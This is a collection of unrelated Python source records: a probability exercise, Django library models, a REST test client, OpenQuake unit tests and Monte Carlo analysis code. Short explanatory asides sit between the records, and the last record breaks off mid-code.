+{"seq_id":"3242679","text":"# exercise-probability-01.py\n\n# [xkcd: Frequentists vs. Bayesians](https://xkcd.com/1132/)\n\nimport random\n\n# code 1.1\n# Calling random.randint(0, 1) returns a random integer between 0 and 1 inclusive.\nnumber = random.randint(0, 1)\n\n# code 1.2\n# To check whether the variable \"number\" equals 0, I can use a conditional block.\nif number == 0:\n print(\"the number is 0\")\n\n# code 1.3\n# To find out which value the variable \"number\" holds, I can use a loop.\nfor i in range(0, 2):\n if number == i:\n # print with the variable interpolated via an \"f-string\"\n print(f\"the number is {number}\")\n\n# exercise 1.1\n# Alice and Bob want to play heads or tails.\n# - if the variable \"head_or_tail\" is 0, that means heads\n# - if it is 1, that means tails\n# Alice bets on heads and Bob bets on tails.\n# Who wins? Alice or Bob?\n# Write the code that prints the winner's name.\n\nhead_or_tail = random.randint(0, 1)\n\n# answer 1.1\n\n# exercise 1.2\n# Alice and Bob want to play dice.\n# Alice bets the roll will be at least 4. Bob bets it will be at most 3.\n# Who wins? Alice or Bob?\n# Write the code that prints the winner's name.\n\ndice = random.randint(1, 6)\n\n# answer 1.2\n\n# exercise 1.3\n# Alice and Bob play rock paper scissors.\n# - 1 means rock\n# - 2 means paper\n# - 3 means scissors\n# Write the code that prints who wins.\n\nalice = random.randint(1, 3)\nbob = random.randint(1, 3)\nprint(alice, bob)\n\n# answer 1.3\n\n","sub_path":"exercise-probability-01.py","file_name":"exercise-probability-01.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
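
One possible solution to exercise 1.3, kept outside the exercise file on purpose: with the 1=rock, 2=paper, 3=scissors coding, "x beats y" is exactly x == y % 3 + 1.

def rps_winner(alice, bob):
    # rock(1) beats scissors(3), paper(2) beats rock(1), scissors(3) beat paper(2)
    if alice == bob:
        return "draw"
    return "Alice" if alice == bob % 3 + 1 else "Bob"

assert rps_winner(1, 3) == "Alice"   # rock beats scissors
assert rps_winner(2, 3) == "Bob"     # scissors beat paper
assert rps_winner(2, 2) == "draw"
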
+{"seq_id":"501152262","text":"from django.db import models\nfrom django.urls import reverse # needed by the get_absolute_url() methods below\nimport uuid # required for unique book instances\n\n# Create your models here.\nclass Genre(models.Model):\n \"\"\"\n Model representing a book genre (e.g. Science Fiction, Non Fiction).\n \"\"\"\n name = models.CharField(max_length=200, help_text=\"Enter a book genre (e.g. Science Fiction, French Poetry etc.)\")\n\n def __str__(self):\n \"\"\"\n String for representing the Model object (in Admin site etc.)\n \"\"\"\n return self.name\n\nclass book(models.Model):\n \"\"\"\n Model representing a book\n \"\"\"\n title = models.CharField(max_length=20)\n author = models.ForeignKey('Author', on_delete=models.SET_NULL, null=True)\n summary = models.TextField(max_length=1000, help_text=\"Enter summary of book\")\n isbn = models.CharField('ISBN', max_length=50, help_text=\"13 character ISBN\")\n genre = models.ManyToManyField(Genre, help_text=\"Select genre for this book\")\n\n def display_genre(self):\n \"\"\"\n Creates a string for the Genre. This is required to display genre in Admin.\n \"\"\"\n return ', '.join([genre.name for genre in self.genre.all()[:3]])\n display_genre.short_description = 'Genre'\n\n def __str__(self):\n \"\"\"\n String for representing the Model object.\n \"\"\"\n return self.title\n\n def get_absolute_url(self):\n \"\"\"\n Returns the url to access a particular book instance.\n \"\"\"\n return reverse('book-detail', args=[str(self.id)])\n\nclass bookinstance(models.Model):\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, help_text=\"unique ID for this particular book across whole library\")\n book = models.ForeignKey('book', on_delete=models.SET_NULL, null=True)\n imprint = models.CharField(max_length=200)\n due_back = models.DateField(null=True, blank=True)\n LOAN_STATUS = (\n ('m', 'Maintenance'),\n ('o', 'on loan'),\n ('a', 'Available'),\n ('r', 'Reserved')\n )\n status = models.CharField(max_length=1, choices=LOAN_STATUS, blank=True, default='m', help_text='Book Availability')\n\n class Meta:\n ordering = [\"due_back\"]\n\n def __str__(self):\n return '%s (%s)' % (self.id, self.book.title)\n\nclass Author(models.Model):\n \"\"\"\n Model representing an author.\n \"\"\"\n first_name = models.CharField(max_length=100)\n last_name = models.CharField(max_length=100)\n date_of_birth = models.DateField(null=True)\n date_of_death = models.DateField(null=True)\n\n def get_absolute_url(self):\n return reverse('author-detail', args=[str(self.id)])\n\n def __str__(self):\n \"\"\"\n String for representing the Model object.\n \"\"\"\n return '%s, %s' % (self.last_name, self.first_name)\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
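
display_genre in the record above exists so the admin list view can show a ManyToMany field, which list_display cannot render directly. A sketch of the admin.py that would use it (assumed, not part of this models.py):

from django.contrib import admin
from .models import Author, Genre, book, bookinstance

@admin.register(book)
class BookAdmin(admin.ModelAdmin):
    # 'display_genre' is the callable defined on the book model
    list_display = ('title', 'author', 'display_genre')

admin.site.register([Author, Genre, bookinstance])
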
+{"seq_id":"227953099","text":"# Copyright (C) 2020 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\"\"\"REST API client.\"\"\"\n\nimport json\nimport urlparse\n\nimport requests\n\nfrom lib import environment, url as url_module, users\nfrom lib.constants import objects\nfrom lib.service.rest import session_pool\nfrom lib.service.rest.template_provider import TemplateProvider\n\n\nclass RestClient(object):\n \"\"\"Client for HTTP interactions with GGRC's REST API.\"\"\"\n\n STATUS_CODES = {'OK': 200,\n 'FAIL': [400, 404, 500]}\n\n def __init__(self, endpoint=\"\"):\n self.endpoint = endpoint if endpoint == url_module.QUERY else (\n objects.get_singular(endpoint))\n self.is_api = \"\" if endpoint == url_module.QUERY else url_module.API\n self.endpoint_url = urlparse.urljoin(\n environment.app_url, \"/\".join([self.is_api, endpoint]))\n self.session = session_pool.get_session(users.current_user())\n\n def get_session(self, obj_dict):\n \"\"\"Return newly create session if it is external user needed else\n session from the pool.\"\"\"\n return session_pool.create_session(\n users.current_user(), is_external=True) if (\n self.is_external_user_needed(obj_dict)) else (\n session_pool.get_session(users.current_user()))\n\n def is_endpoint_external(self):\n \"\"\"Checks if endpoint is external.\"\"\"\n return self.endpoint in objects.EXTERNAL_END_POINTS\n\n def is_relationship_types_external(self, obj_dict):\n \"\"\"Check if source or destination objects type is external.\"\"\"\n return (self.endpoint == objects.get_singular(objects.RELATIONSHIPS) and\n (any(x for x in objects.SINGULAR_DISABLED_OBJS\n if x.title() in (obj_dict[\"source\"][\"type\"],\n obj_dict[\"destination\"][\"type\"]))))\n\n def is_ca_external(self, obj_dict):\n \"\"\"Check if custom attribute is external.\"\"\"\n return (self.endpoint == objects.get_singular(\n objects.CUSTOM_ATTRIBUTES) and\n obj_dict[\"definition_type\"] in objects.ALL_SINGULAR_DISABLED_OBJS)\n\n def is_external_user_needed(self, obj_dict):\n \"\"\"Return True if request related to controls or GCAs for controls.\"\"\"\n # pylint: disable=invalid-name\n if not self.is_api:\n return False\n\n obj_dict = obj_dict[0][obj_dict[0].keys()[0]] if isinstance(\n obj_dict, list) else obj_dict[obj_dict.keys()[0]]\n\n return (self.is_endpoint_external() or\n self.is_ca_external(obj_dict) or\n self.is_relationship_types_external(obj_dict))\n\n def send_get(self, url, **kwargs):\n \"\"\"Send GET request to `url`\"\"\"\n url = urlparse.urljoin(environment.app_url, url)\n return self.session.get(url, **kwargs).json()\n\n def send_post(self, url, **kwargs):\n \"\"\"Send POST request to `url`\"\"\"\n url = urlparse.urljoin(environment.app_url, url)\n return self.session.post(url, **kwargs).json()\n\n def create_object(self, **kwargs):\n \"\"\"Create object or make other operations used POST request and\n return raw response.\n \"\"\"\n kwargs.pop(\"type\").lower()\n create_obj_req_body = self.generate_body(self.endpoint, **kwargs)\n if (\n self.is_api and self.is_external_user_needed(\n json.loads(create_obj_req_body))\n ):\n return requests.post(\n url=self.endpoint_url,\n data=create_obj_req_body,\n headers=self.get_session(json.loads(create_obj_req_body)).headers)\n else:\n return self.get_session(json.loads(create_obj_req_body)).post(\n url=self.endpoint_url, data=create_obj_req_body)\n\n def update_object(self, href, **kwargs):\n \"\"\"Update object used GET, POST requests and return raw response.\"\"\"\n href_url = 
urlparse.urljoin(environment.app_url, href)\n obj_resp = self.get_object(href_url)\n obj_resp_dict = json.loads(obj_resp.text)\n session = self.get_session(obj_resp_dict)\n headers_for_updation = self.req_headers_from_resp_headers(\n resp_headers=obj_resp.headers)\n update_obj_req_body = self.update_body(body=obj_resp.text, **kwargs)\n if self.is_api and self.is_external_user_needed(obj_resp_dict):\n headers_for_updation.update(session.headers)\n return requests.put(\n url=href_url, data=update_obj_req_body, headers=headers_for_updation)\n\n else:\n return session.put(\n url=href_url, data=update_obj_req_body, headers=headers_for_updation)\n\n def delete_object(self, href):\n \"\"\"Delete object used GET, POST requests and return raw response.\"\"\"\n href_url = urlparse.urljoin(environment.app_url, href)\n obj_resp = self.get_object(href_url)\n obj_resp_dict = json.loads(obj_resp.text)\n session = self.get_session(obj_resp_dict)\n headers_for_deleting = self.req_headers_from_resp_headers(\n resp_headers=obj_resp.headers)\n if self.is_api and self.is_external_user_needed(obj_resp_dict):\n headers_for_deleting.update(session.headers)\n return requests.delete(\n url=href_url, headers=headers_for_deleting)\n else:\n return session.delete(\n url=href_url, headers=headers_for_deleting)\n\n def get_object(self, href):\n \"\"\"Get object used GET request and return raw response.\"\"\"\n href_url = urlparse.urljoin(environment.app_url, href)\n get_obj_resp = self.session.get(url=href_url)\n return get_obj_resp\n\n def generate_body(self, type_name, **kwargs):\n \"\"\"Generate body of HTTP request based on JSON representation.\"\"\"\n body = TemplateProvider.generate_template_as_dict(\n json_tmpl_name=type_name, **kwargs)\n if not self.is_api:\n body = body[type_name]\n return json.dumps([body]).encode(\"string-escape\")\n\n @staticmethod\n def req_headers_from_resp_headers(resp_headers=None):\n \"\"\"Return request headers from response headers.\"\"\"\n headers = {}\n if resp_headers:\n headers[\"If-Match\"] = resp_headers[\"etag\"]\n headers[\"If-Unmodified-Since\"] = resp_headers[\"last-modified\"]\n return headers\n\n @staticmethod\n def update_body(body, **kwargs):\n \"\"\"Update body of HTTP request based on JSON representation.\"\"\"\n return json.dumps(TemplateProvider.update_template_as_dict(\n json_data_str=body, **kwargs)).encode(\"string-escape\")\n","sub_path":"test/selenium/src/lib/service/rest/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
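
update_object and delete_object above rely on optimistic concurrency: the ETag and Last-Modified from a GET must be echoed back as If-Match and If-Unmodified-Since so the server can reject stale writes. In isolation, with header values invented for illustration:

resp_headers = {"etag": '"abc123"',
                "last-modified": "Mon, 01 Jan 2018 00:00:00 GMT"}
headers = RestClient.req_headers_from_resp_headers(resp_headers)
assert headers == {"If-Match": '"abc123"',
                   "If-Unmodified-Since": "Mon, 01 Jan 2018 00:00:00 GMT"}
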
+{"seq_id":"324838769","text":"# -*- coding: utf-8 -*-\n# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright (c) 2010-2011, GEM Foundation.\n#\n# OpenQuake is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License version 3\n# only, as published by the Free Software Foundation.\n#\n# OpenQuake is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License version 3 for more details\n# (a copy is included in the LICENSE file that accompanied this code).\n#\n# You should have received a copy of the GNU Lesser General Public License\n# version 3 along with OpenQuake. If not, see\n# for a copy of the LGPLv3 License.\n\n\n\"\"\"\ndatabase related unit tests for the geonode/mtapi/views.py module.\n\"\"\"\n\n\nimport mock\nimport os\nimport unittest\n\nfrom django.conf import settings\n\nfrom geonode.mtapi.models import OqJob, Upload\nfrom geonode.mtapi.views import (\n prepare_job, prepare_job_result, prepare_map_result, start_job)\nfrom geonode.mtapi import view_utils\n\nfrom db_tests.helpers import DbTestMixin\n\n\ndef get_post_params(additional_fields=None):\n \"\"\"\n Return a dictionary similar to the POST parameters received by the\n \"hazard_risk_calc\" API endpoint.\n\n :param dict additional_data: additional data the caller wants added to the\n dict to be returned.\n \"\"\"\n upload = DbTestMixin().setup_upload()\n post_params = {\n \"model\": \"openquake.calculationparams\",\n \"upload\": upload.id,\n \"fields\":\n {\"job_type\": \"classical\",\n \"region_grid_spacing\": 0.1,\n \"min_magnitude\": 5,\n \"investigation_time\": 50,\n \"component\": \"average\",\n \"imt\": \"pga\",\n \"truncation_type\": \"none\",\n \"truncation_level\": 3.0,\n \"reference_v30_value\": 800,\n \"imls\": [0.2, 0.02, 0.01],\n \"poes\": [0.2, 0.02, 0.01],\n \"realizations\": 6,\n \"region\": \"POLYGON((16.460737205888 41.257786872643, \"\n \"16.460898138429 41.257786872643, 16.460898138429 \"\n \"41.257923984376, 16.460737205888 41.257923984376, \"\n \"16.460737205888 41.257786872643))\"}}\n if additional_fields:\n post_params[\"fields\"].update(additional_fields)\n return post_params\n\n\nclass PrepareJobResultTestCase(unittest.TestCase, DbTestMixin):\n \"\"\"Tests the behaviour of views.prepare_job_result().\"\"\"\n\n def tearDown(self):\n if getattr(self, \"upload\", None) and self.upload:\n self.teardown_upload(self.upload)\n if getattr(self, \"job_to_teardown\", None) and self.job_to_teardown:\n self.teardown_job(self.job_to_teardown)\n\n def test_prepare_job_result_with_failed(self):\n \"\"\"\n The result dictionary for failed OpenQuake jobs is prepared correctly.\n \"\"\"\n post_params = get_post_params()\n job = prepare_job(post_params)\n self.upload = job.oq_params.upload\n job.status = \"failed\"\n self.assertEqual(\n {\"msg\": \"Calculation failed\", \"status\": \"failure\",\n \"id\": job.id},\n prepare_job_result(job))\n\n def test_prepare_job_result_with_succeeded_no_maps(self):\n \"\"\"\n The result dictionary for succeeded OpenQuake jobs (w/o hazard/loss\n maps) is prepared correctly.\n \"\"\"\n post_params = get_post_params()\n job = prepare_job(post_params)\n self.upload = job.oq_params.upload\n job.status = \"succeeded\"\n self.assertEqual(\n {\"msg\": \"Calculation succeeded\", \"status\": \"success\",\n \"id\": job.id, \"files\": []},\n prepare_job_result(job))\n\n def 
test_prepare_job_result_with_succeeded_and_maps(self):\n \"\"\"\n The result dictionary for succeeded OpenQuake jobs (w/o hazard/loss\n maps) is prepared correctly.\n \"\"\"\n hazard_map = self.setup_output()\n self.job_to_teardown = job = hazard_map.oq_job\n self.add_shapefile_data(hazard_map)\n hazard_layer, _ = os.path.splitext(\n os.path.basename(hazard_map.shapefile_path))\n hazard_file = os.path.basename(hazard_map.path)\n\n loss_map = self.setup_output(job_to_use=job, output_type=\"loss_map\")\n self.add_shapefile_data(loss_map)\n loss_layer, _ = os.path.splitext(\n os.path.basename(loss_map.shapefile_path))\n loss_file = os.path.basename(loss_map.path)\n job.status = \"succeeded\"\n expected = {\n \"id\": job.id,\n \"msg\": \"Calculation succeeded\",\n \"status\": \"success\",\n \"files\": [\n {\"id\": hazard_map.id,\n \"layer\": {\n \"layer\": \"geonode:hazard_map_data\",\n \"filter\": \"output_id=%s\" % hazard_map.id,\n \"ows\": \"http://gemsun02.ethz.ch/geoserver-geonode-dev/ows\"},\n \"min\": view_utils.round_float(hazard_map.min_value),\n \"max\": view_utils.round_float(hazard_map.max_value),\n \"name\": \"%s-%s\" % (job.id, hazard_file),\n \"type\": \"hazard map\"},\n {\"id\": loss_map.id,\n \"layer\": {\n \"layer\": \"geonode:loss_map_data\",\n \"filter\": \"output_id=%s\" % loss_map.id,\n \"ows\": \"http://gemsun02.ethz.ch/geoserver-geonode-dev/ows\"},\n \"min\": view_utils.round_float(loss_map.min_value),\n \"max\": view_utils.round_float(loss_map.max_value),\n \"name\": \"%s-%s\" % (job.id, loss_file),\n \"type\": \"loss map\"}]}\n\n actual = prepare_job_result(job)\n self.assertEqual(expected, actual)\n\n\nclass PrepareJobTestCase(unittest.TestCase, DbTestMixin):\n \"\"\"Tests the behaviour of views.prepare_job().\"\"\"\n\n def tearDown(self):\n self.teardown_upload(self.upload)\n\n def test_prepare_job(self):\n \"\"\"\n `prepare_job` returns a :py:class:`geonode.mtapi.models.OqJob`\n instance. The latter's `oq_params` property refers to the correct\n upload record.\n \"\"\"\n post_params = get_post_params()\n job = prepare_job(post_params)\n self.assertTrue(isinstance(job, OqJob))\n self.upload = Upload.objects.get(id=post_params[\"upload\"])\n self.assertEqual(self.upload, job.oq_params.upload)\n\n def test_prepare_job_param_values(self):\n \"\"\"\n `prepare_job` returns a :py:class:`geonode.mtapi.models.OqJob`\n instance. 
The latter's `oq_params` property is initialized correctly.\n \"\"\"\n post_params = get_post_params()\n oqp = prepare_job(post_params).oq_params\n self.upload = oqp.upload\n trans_tab = dict(reference_v30_value=\"reference_vs30_value\")\n param_names = (\n \"job_type\", \"region_grid_spacing\", \"min_magnitude\",\n \"investigation_time\", \"component\", \"imt\", \"truncation_type\",\n \"truncation_level\", \"reference_v30_value\", \"imls\", \"poes\",\n \"realizations\")\n for param_name in param_names:\n attr_name = trans_tab.get(param_name, param_name)\n self.assertEqual(getattr(oqp, attr_name),\n post_params[\"fields\"][param_name])\n\n def test_prepare_job_ignored_params(self):\n \"\"\"\n `prepare_job()` ignores the following parameters: \"period\",\n \"gm_correlated\" and \"histories\" for classical job types.\n \"\"\"\n ignored_fields = {\"period\": 1, \"histories\": 1, \"gm_correlated\": False}\n post_params = get_post_params(ignored_fields)\n oqp = prepare_job(post_params).oq_params\n self.upload = oqp.upload\n trans_tab = dict(reference_v30_value=\"reference_vs30_value\")\n param_names = (\n \"job_type\", \"region_grid_spacing\", \"min_magnitude\",\n \"investigation_time\", \"component\", \"imt\", \"truncation_type\",\n \"truncation_level\", \"reference_v30_value\", \"imls\", \"poes\",\n \"realizations\")\n for param_name in param_names:\n attr_name = trans_tab.get(param_name, param_name)\n self.assertEqual(getattr(oqp, attr_name),\n post_params[\"fields\"][param_name])\n\n\nclass StartJobTestCase(unittest.TestCase, DbTestMixin):\n \"\"\"Tests the behaviour of views.start_job().\"\"\"\n\n def tearDown(self):\n self.teardown_upload(self.upload)\n\n def test_start_job(self):\n \"\"\"\n The oqrunner process is started with the correct path/arguments and\n its process ID (pid) is captured in the corresponding job record.\n \"\"\"\n post_params = get_post_params()\n job = prepare_job(post_params)\n self.upload = job.oq_params.upload\n process_mock = mock.MagicMock(name=\"mock:the-process\")\n process_mock.pid = 31459\n popen_mock = mock.MagicMock(name=\"mock:subprocess.Popen\")\n popen_mock.return_value = process_mock\n with mock.patch('subprocess.Popen', new=popen_mock):\n self.assertEqual(0, job.job_pid)\n start_job(job)\n args, _kwargs = popen_mock.call_args\n self.assertEqual(\n ([settings.OQRUNNER_PATH, \"-j\", str(job.id)],), args)\n self.assertEqual(31459, job.job_pid)\n\n\nclass PrepareMapResultTestCase(unittest.TestCase, DbTestMixin):\n \"\"\"Tests the behaviour of views.prepare_map_result().\"\"\"\n\n def tearDown(self):\n self.teardown_output(self.output)\n\n def test_prepare_map_result_with_hazard(self):\n \"\"\"\n prepare_map_result() returns a correct result dictionary for a\n hazard map.\n \"\"\"\n self.output = self.setup_output()\n self.output.min_value, self.output.max_value = (10.0, 20.0)\n\n name = os.path.basename(self.output.path)\n map_type = (\"hazard map\" if self.output.output_type == \"hazard_map\"\n else \"loss map\")\n expected = {\n \"layer\": {\n \"layer\": \"geonode:hazard_map_data\",\n \"filter\": \"output_id=%s\" % self.output.id,\n \"ows\": \"http://gemsun02.ethz.ch/geoserver-geonode-dev/ows\"},\n \"name\": \"%s-%s\" % (self.output.oq_job.id, name),\n \"min\": view_utils.round_float(self.output.min_value),\n \"max\": view_utils.round_float(self.output.max_value),\n \"type\": map_type,\n \"id\": self.output.id}\n\n actual = prepare_map_result(self.output)\n self.assertEqual(expected, actual)\n\n def test_prepare_map_result_with_loss(self):\n \"\"\"\n 
prepare_map_result() returns a correct result dictionary for a\n        loss map.\n        \"\"\"\n        self.output = self.setup_output(output_type=\"loss_map\")\n        self.output.min_value, self.output.max_value = (30.0, 40.0)\n\n        name = os.path.basename(self.output.path)\n        # the output type is fixed to \"loss_map\" above, so no conditional is needed\n        map_type = \"loss map\"\n        expected = {\n            \"layer\": {\n                \"layer\": \"geonode:loss_map_data\",\n                \"filter\": \"output_id=%s\" % self.output.id,\n                \"ows\": \"http://gemsun02.ethz.ch/geoserver-geonode-dev/ows\"},\n            \"name\": \"%s-%s\" % (self.output.oq_job.id, name),\n            \"min\": view_utils.round_float(self.output.min_value),\n            \"max\": view_utils.round_float(self.output.max_value),\n            \"type\": map_type,\n            \"id\": self.output.id}\n\n        actual = prepare_map_result(self.output)\n        self.assertEqual(expected, actual)\n","sub_path":"db_tests/mtapi_views_unittest.py","file_name":"mtapi_views_unittest.py","file_ext":"py","file_size_in_byte":11672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"320171501","text":"from mcsim import MCDataSim\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport json\nimport pandas as pd\nimport seaborn as sns\nfrom mcsim import remove_redundant_ticks\n\nclass ExploringRIMK(MCDataSim):\n def __init__(*args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def exploring_rim_k(self, noise_index: int = 3, topk=10, p=3, save_dir=None, arim=True, algo=\"ppo\"):\n fs=25; algname1=\"\"\n if algo == \"lbfgs\":\n ni = None\n else:\n ni = self.noises[noise_index]\n pdf_dict = json.load(open(self.get_mcname(ni, self.noises), \"rb\"))\n pdf_dict = np.array(pdf_dict[algo]) # shape (noise, cont, samples)\n #idx = self.get_top_k_by_fid_idx(pdf_dict[0].mean(axis=-1), topk)\n pdf_dict = pdf_dict[np.ix_(np.ones(pdf_dict.shape[0], dtype=bool), \n self.get_ranks(-1*pdf_dict[0].mean(axis=-1))<=topk)] # filter by observed fid\n from wd_sortof_fast_implementation import RIM_p\n def get_rim_function(k):\n from scipy.stats import skew, kurtosis\n if k==\"var\":\n rim = lambda cont_dist: cont_dist.var()\n elif k==\"skewness\":\n rim = lambda cont_dist: 0 #skew(cont_dist)\n elif k==\"kurtosis\":\n rim = lambda cont_dist: 0# kurtosis(cont_dist)\n else:\n rim = lambda cont_dist : RIM_p(cont_dist, p=k)\n return rim\n\n def rim_k(k):\n rimks = np.array([list(map(get_rim_function(k), pdf_dict[i])) for i in range(len(pdf_dict))])\n # idxes1 = self.get_top_k_by_fid_idx(rimks, topk=topk)\n # rimks = rimks[idxes1]\n return rimks\n rim_ks = [rim_k(k) for k in range(1,p+1)] # (k, noise, cont)\n rim_ks.append(rim_k(\"var\"))\n rim_ks.append(rim_k(\"skewness\"))\n rim_ks.append(rim_k(\"kurtosis\"))\n rim_ks= np.array(rim_ks)\n reg_coeffs = np.zeros((p+1+3, topk)) # (k, cont)\n \n # arim moments\n if arim:\n fig, ax = plt.subplots()\n for k in list(range(1,len(rim_ks)-2))+[\"var\", \"skewness\", \"kurtosis\"]:\n if isinstance(k, int):\n label=f\"ARIM {k+1}\"\n else:\n label=k\n ax.plot(self.noises, list(map(get_rim_function(k), 1-rim_ks[0])), label=label)\n ax.set_title(f\"algo {algo} nlevel opt. 
{noise_index*0.01} top-k={topk}\")\n ax.set_xlabel(\"noise\")\n ax.set_ylabel(\"ARIM_p\")\n ax.legend()\n if save_dir:\n fig.savefig(save_dir+\"/\"+\"arim_p_\"+ algo + f\"_noise_opt{ni}\" +f\"_L{self.Nspin}_O{self.outspin}.png\",\n dpi=1000, bbox_inches=\"tight\")\n return\n fig, ax = plt.subplots(1,1)\n for cont in range(topk):\n # for i in range(len(self.noises)):\n # plt.figure()\n # label=\"\"\n # for k in range(len(rim_ks)):\n # z=\"rim k={}: {} \".format(k+1, round(rim_ks[k][i][cont],6))\n # label+= z\n # label += f\"noise lvl: {i}\"\n # plt.hist(pdf_dict[i][cont], bins=np.linspace(0,1,50))\n # plt.title(label)\n for k in range(len(rim_ks)):\n color=self.colors[k]\n if cont==0:\n label=f\"rim {k+1}\"\n if k==p:\n label=\"var\"\n elif k==p+1:\n label=\"skewness\"\n elif k==p+2:\n label=\"kurtosis\"\n else:\n label=None\n from scipy.stats import linregress \n assert rim_ks[k][:,cont].shape[-1]==11, f\"Not in the noise level index yet {rim_ks[k][:,cont].shape[-1]}\"\n if k==0:\n reg_coeff = linregress(self.noises, rim_ks[k][:,cont])[0]\n reg_coeffs[k][cont] = reg_coeff\n reg_coeffs[k+1][cont] = rim_ks[k][:,cont][1]\n else:\n if k < p:\n reg_coeffs[k+1][cont] = rim_ks[k][:,cont][1]-rim_ks[0][:,cont][1] # at noise level 1\n else:\n reg_coeffs[k+1][cont] = rim_ks[k][:,cont][1]\n ax.plot(self.noises, rim_ks[k][:,cont], label=label,color=color)\n ax.set_xlabel(\"noise\")\n ax.set_ylabel(\"RIM_k\")\n ax.legend()\n cols = []\n for k in range(len(rim_ks)-3):\n if k==0:\n cols.append(f\"RIM_1 growth factor {k+1}\")\n cols.append(f\"RIM {k+1}\")\n else:\n cols.append(f\"RIM {k+1}\")\n cols.append(f\"Var\")\n cols.append(f\"Skew\")\n cols.append(f\"Kurt\")\n df = pd.DataFrame(reg_coeffs.T, columns=cols)\n print(df.corr())\n plt.figure()\n g = sns.pairplot(df, corner=True)\n def corrfunc(x, y, **kws):\n from scipy.stats import kendalltau\n r, _ = kendalltau(x, y)\n ax = plt.gca()\n ax.annotate(\"tau = {:.2f}\".format(r),\n xy=(.1, .9), xycoords=ax.transAxes)\n g.map_lower(corrfunc)\n\n raise AssertionError\n lbfgs_wd_data = self.get_metrics_dict(None, self.noises, algoname=\"lbfgs\")[\"lbfgs\"]\n wd_data_c1 = np.array(lbfgs_wd_data[r'$W(.,\\delta(x-1))$'])\n print(wd_data_c1.shape)\n idxes1 = self.get_top_k_by_fid_idx(wd_data_c1, topk=topk)\n wd_data_c1 = wd_data_c1[idxes1]\n # wd_data_u, wd_data_l = wd_data[r'$W(.,\\delta(x-1))$'+ ' upper'], wd_data[r'$W(.,\\delta(x-1))$'+ ' lower'] \n \n q951 = np.array(lbfgs_wd_data['Q th. 0.95'])[idxes1]\n q981 = np.array(lbfgs_wd_data['Q th. 
0.98'])[idxes1]\n \n \n\n fig, ax = plt.subplots(figsize=(7,7))\n # ax.scatter(-1*q951[noise_index], wd_data_c1[noise_index], alpha=0.5, c=\"blue\", \n # label=r\"$\\mathcal{F}_{\\rm Th}$\"+\"=0.95\"+f\" \\n Spearman={spearman1}\")\n # # plt.scatter(-1*q952[2], wd_data_c2[2], alpha=0.5, c=\"orange\")\n # ax.scatter(-1*q981[noise_index], wd_data_c1[noise_index], alpha=0.5, marker=\"o\", \n # label=r\"$\\mathcal{F}_{\\rm Th}$\"+\"=0.98\"+f\" \\n Spearman={spearman2}\")\n for k in range(1,p+1):\n ax.scatter(rim_k(2)[noise_index], rim_k(k)[noise_index], alpha=0.5, marker=r\"${}$\".format(k), \n label=f\"k={k}\", s=100)\n # plt.scatter(-1*q982[3], wd_data_c2[3], alpha=0.5, marker=\"o\")\n ax.set_xlabel(r\"$\\rm{RIM}_1$\", fontsize=fs)\n ax.set_ylabel(r\"$\\rm{RIM}_k$\", fontsize=fs)\n ax.tick_params(axis='both', which='major', labelsize=fs)\n ax.legend(fontsize=15)\n ax.set_title(r\"$\\sigma_{\\rm sim}=$\"+f\"{self.noises[noise_index]}, {algname1}\", fontsize=fs)\n # savename=\"qfactorintuition_N\"+str(self.Nspin)+\"to\"+str(self.outspin)\n # fname = self.save_fig(fig, name=savename, copyto=self.poster_fig_save_folder)\n return\n \n def exploring_metrics(self, noise_index: int = 2, topk=200, allnoisesplot=False):\n fs=25; algname1=\"\"\n lbfgs_wd_data = self.get_metrics_dict(None, self.noises, algoname=\"lbfgs\")[\"lbfgs\"]\n ppo_wd_data = self.get_metrics_dict(self.noises[noise_index], self.noises, algoname=\"ppo\")[\"ppo\"]\n wd_data_c1 = np.array(lbfgs_wd_data[r'$W(.,\\delta(x-1))$'])\n idxes1 = self.get_top_k_by_fid_idx(wd_data_c1, topk=topk)\n wd_data_c1 = wd_data_c1[idxes1]\n # wd_data_u, wd_data_l = wd_data[r'$W(.,\\delta(x-1))$'+ ' upper'], wd_data[r'$W(.,\\delta(x-1))$'+ ' lower'] \n \n q951 = np.array(lbfgs_wd_data['Q th. 0.95'])[idxes1]\n q981 = np.array(lbfgs_wd_data['Q th. 0.98'])[idxes1]\n \n\n # savefile = {\"rim\":wd_data_c1.tolist(), \"q_98\":q981.tolist(), \"q_95\":q951.tolist()}\n # json.dump(savefile, open(\"rim_fig1_data.json\", \"w\"))\n \n ######## ppo controllers ################\n # wd_data_c2 = np.array(ppo_wd_data[r'$W(.,\\delta(x-1))$'])\n # idxes2 = self.get_top_k_by_fid_idx(wd_data_c2, topk=topk)\n # wd_data_c2 = wd_data_c2[idxes2]\n # q952 = np.array(ppo_wd_data['Q th. 0.95'])[idxes2]\n # q982 = np.array(ppo_wd_data['Q th. 
